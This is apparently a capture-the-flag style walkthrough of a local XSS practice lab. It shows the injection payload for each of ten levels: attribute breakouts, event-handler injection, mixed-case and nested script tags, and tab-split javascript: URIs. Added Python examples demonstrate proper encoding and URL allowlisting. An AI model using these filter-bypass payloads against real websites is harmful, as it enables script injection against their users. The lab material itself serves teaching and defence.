XSS practice lab
Level 1
![](https://upload-images.jianshu.io/upload_images/4664072-33a95a9f9be9ba40.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
localhost:8083/xss/level1.php?name=test<script>alert(1)</script>
![](https://upload-images.jianshu.io/upload_images/4664072-f96b436427869394.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Level 2
![](https://upload-images.jianshu.io/upload_images/4664072-145b2f71d7c8e246.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Source
![](https://upload-images.jianshu.io/upload_images/4664072-ceb02b0257071704.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Enter JS code in the text box and view the page source.
![](https://upload-images.jianshu.io/upload_images/4664072-3a5f9cf3f5c7ab9e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Because the `<` in the first reflection point is escaped, try the second one.
Shape of the source
<input name=keyword value=" ">
Injected code
"><script>alert(1)</script><a class="
Full resulting markup
<input name=keyword value=""><script>alert(1)</script><a class="">
![](https://upload-images.jianshu.io/upload_images/4664072-35b3b506db56533b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Level 3
"><script>alert(1)</script><a class="
![](https://upload-images.jianshu.io/upload_images/4664072-a3ef995de3def14e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
The second reflection point also escapes `<`, and the attribute is single-quoted.
Shape of the source
<input name=keyword value=' '>
Injected code
' onfocus='alert(1)
Full resulting markup
<input name=keyword value='' onfocus='alert(1)'>
![](https://upload-images.jianshu.io/upload_images/4664072-e3f2f1afa4a30967.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Level 4
![](https://upload-images.jianshu.io/upload_images/4664072-b60d8cfc608a67d7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Double quotes
Shape of the source
<input name=keyword value=" ">
Injected code
" onfocus="alert(1)
Full resulting markup
<input name=keyword value="" onfocus="alert(1)">
![](https://upload-images.jianshu.io/upload_images/4664072-0e917cbcf79967c7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
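As an added example (not code from this walkthrough or from the lab itself), the three reflection contexts from levels 2 to 4 are rebuilt below in Python next to a context-aware encoder. The payloads are the ones shown above; the tokenizer check uses the standard library's html.parser to show what a browser would make of each rendered string. Helper names are my own.

```python
# Added example, not from the original walkthrough or from the lab's own
# source: the level 2-4 reflection contexts rebuilt in Python, next to a
# context-aware encoder. Helper names are my own.
import html
from html.parser import HTMLParser

# Payloads as shown in the walkthrough for levels 2, 3 and 4.
LEVEL2_PAYLOAD = '"><script>alert(1)</script><a class="'
LEVEL3_PAYLOAD = "' onfocus='alert(1)"
LEVEL4_PAYLOAD = '" onfocus="alert(1)'


def render_unescaped(value):
    """Level 2 style: the value lands inside value="..." untouched."""
    return f'<input name=keyword value="{value}">'


def render_lt_only(value, quote):
    """Level 3 (quote="'") and level 4 (quote='"') style: only < and > are
    escaped, so no new tag can be opened, but the quote that delimits the
    attribute is left alone and a new attribute can still be started."""
    escaped = value.replace("<", "&lt;").replace(">", "&gt;")
    return f"<input name=keyword value={quote}{escaped}{quote}>"


def render_safe(value):
    """Attribute-context encoding: & < > " and ' are all encoded, so no
    character of the value can terminate the quoted attribute."""
    return f'<input name=keyword value="{html.escape(value, quote=True)}">'


class TagCollector(HTMLParser):
    """Records every start tag with its attributes, i.e. what a browser's
    tokenizer would produce from the markup."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(markup):
    """Return [(tag_name, {attr: value}), ...] for the rendered markup."""
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


def breaks_out(markup):
    """True if the markup contains anything beyond the single <input> with
    its name and value attributes, i.e. the payload escaped its context."""
    tags = parse_tags(markup)
    return len(tags) != 1 or set(tags[0][1]) != {"name", "value"}


if __name__ == "__main__":
    cases = [
        ("level 2, unescaped", render_unescaped(LEVEL2_PAYLOAD)),
        ("level 3, < escaped, single quotes", render_lt_only(LEVEL3_PAYLOAD, "'")),
        ("level 4, < escaped, double quotes", render_lt_only(LEVEL4_PAYLOAD, '"')),
        ("encoded, level 2 payload", render_safe(LEVEL2_PAYLOAD)),
        ("encoded, level 3 payload", render_safe(LEVEL3_PAYLOAD)),
    ]
    for label, markup in cases:
        print(f"{label}: breaks out = {breaks_out(markup)}")
        print("   ", markup)
```

Escaping only `<` and `>` (the level 3 and 4 behaviour) leaves both quote characters free, so the value can still close the attribute it sits in. Encoding the quotes as well (Python's `html.escape` with `quote=True`, or `htmlspecialchars` with `ENT_QUOTES` in PHP) closes that path for any payload, and the parsed attribute value comes back as exactly the original string, so nothing legitimate is lost.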
Level 5
![](https://upload-images.jianshu.io/upload_images/4664072-771e54d173267f9e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Double quotes; `on` is filtered.
"><ScRiPt>alert(1)</script><a class="
![](https://upload-images.jianshu.io/upload_images/4664072-0c5b5d6cc673e4d6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
`script` is filtered.
Shape of the source
<input name=keyword value=" ">
Injected code
"><a href="javascript:alert(1)">点击我</a class="
Full resulting markup
<input name=keyword value=" "><a href="javascript:alert(1)">点击我</a class=" ">
![](https://upload-images.jianshu.io/upload_images/4664072-df1c80647e545610.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Level 6
![](https://upload-images.jianshu.io/upload_images/4664072-87c2025b2f834eee.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
`href` is filtered.
Shape of the source
<input name=keyword value=" ">
Injected code
"><ScRiPt>alert(1)</script><a class="
Full resulting markup
<input name=keyword value=""><ScRiPt>alert(1)</script><a class="">
![](https://upload-images.jianshu.io/upload_images/4664072-1bd110bde274627a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Level 7
![](https://upload-images.jianshu.io/upload_images/4664072-165b1bace3215998.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Shape of the source
<input name=keyword value=" ">
Injected code
"><scrscriptipt>alert(1)</scscriptript><a class="
Full resulting markup
<input name=keyword value=""><scrscriptipt>alert(1)</scscriptript><a class="">
![](https://upload-images.jianshu.io/upload_images/4664072-452d8e2cdcf06cda.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Level 8
![](https://upload-images.jianshu.io/upload_images/4664072-e3b80fa4f289b88e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
`script` is filtered.
Use the javascript: pseudo-protocol (a tab character inside the keyword defeats the filter).
Shape of the source
<a href=" ">
Injected code
javasc ript:alert(1)
Full resulting markup
<a href="javasc ript:alert(1)">
![](https://upload-images.jianshu.io/upload_images/4664072-407f5bfc636d0a58.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Level 9
![](https://upload-images.jianshu.io/upload_images/4664072-7c46544af22c9c64.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Found that the input only has to contain `http://`, and it only has to appear there in full.
Pseudo-protocol (with the `r` converted to its decimal entity)
Shape of the source
<a href=" ">
Injected code
javascript:alert('http://')
Full resulting markup
<a href="javascript:alert('http://')">
![](https://upload-images.jianshu.io/upload_images/4664072-fd629409d1f8a7e2.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
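As an added example (not code from this walkthrough or from the lab), the blacklist checks that levels 7, 8 and 9 rely on are written out below in Python so their failure modes are visible, next to a scheme allowlist for `href` values that rejects every variant without having to know about any of them. The inputs are the payloads shown above; function names are my own.

```python
# Added example, not from the original walkthrough or the lab's own source:
# the level 7-9 blacklist checks rebuilt in Python next to a scheme
# allowlist. Function names are my own.
import re
from typing import Optional
from urllib.parse import urlsplit

# Inputs taken from the walkthrough (levels 7, 8 and 9).
NESTED_SCRIPT = "<scrscriptipt>alert(1)</scscriptript>"
TAB_SPLIT = "javasc\tript:alert(1)"            # level 8: tab inside the keyword
HTTP_IN_STRING = "javascript:alert('http://')"  # level 9: 'http://' present, but not as the scheme


def remove_once(s, word="script"):
    """Level 7 style filter: delete every occurrence of the word in a single
    pass (case-insensitive). A word nested inside itself survives, because
    the pieces left over reassemble into the word that was just removed."""
    return re.sub(re.escape(word), "", s, flags=re.IGNORECASE)


def keyword_blocked(s, word="script"):
    """Level 8 style filter: reject if the keyword appears literally. A tab
    (or newline) inside the keyword defeats the substring test, while the
    browser strips those characters when it parses the URL scheme."""
    return word in s.lower()


def contains_http(s):
    """Level 9 style check: require that 'http://' appear somewhere. It says
    nothing about where it appears."""
    return "http://" in s


def safe_href(raw) -> Optional[str]:
    """Allowlist instead of blacklist: the value is usable as an href only if,
    after dropping the characters browsers ignore inside URLs, it parses with
    an http or https scheme. javascript:, data:, scheme-less, protocol-relative
    and entity-obfuscated schemes all fail this test without being named."""
    cleaned = re.sub(r"[\t\r\n]", "", raw).strip()
    if urlsplit(cleaned).scheme.lower() in ("http", "https"):
        return cleaned
    return None


if __name__ == "__main__":
    print(remove_once(NESTED_SCRIPT))     # the filtered string is <script>alert(1)</script>
    print(keyword_blocked(TAB_SPLIT))     # False: the blacklist lets it through
    print(contains_http(HTTP_IN_STRING))  # True: the 'http://' check lets it through
    for u in (TAB_SPLIT, HTTP_IN_STRING, "//example.com", "http://example.com/?q=1"):
        print(repr(u), "->", safe_href(u))
```

Each blacklist above asks "does the input contain a bad string" and is answered by an input that contains the bad string in a form the check does not recognise. The allowlist asks "does the input parse as one of the few things we are prepared to emit", which is the question a defender can actually answer; rejecting `//example.com` is deliberate, since a protocol-relative URL inherits whatever scheme the page has.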
Level 10
![](https://upload-images.jianshu.io/upload_images/4664072-38484a68e6835d2c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
There are three hidden input tags; check the URL.
?keyword=well done!&t_link=111&t_history=222&t_sort=333
![](https://upload-images.jianshu.io/upload_images/4664072-3659b2222fff0fb0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
The third input tag is reflected, so work on that one.
Shape of the source
<input name="t_sort" value="333" type="hidden">
Injected code
&t_sort=333" onclick=alert(1) type="text
Full resulting markup
<input name="t_sort" value="333" onclick=alert(1)type="text " type="hidden">
This makes the input visible.
![](https://upload-images.jianshu.io/upload_images/4664072-5f115e2fcee949b3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)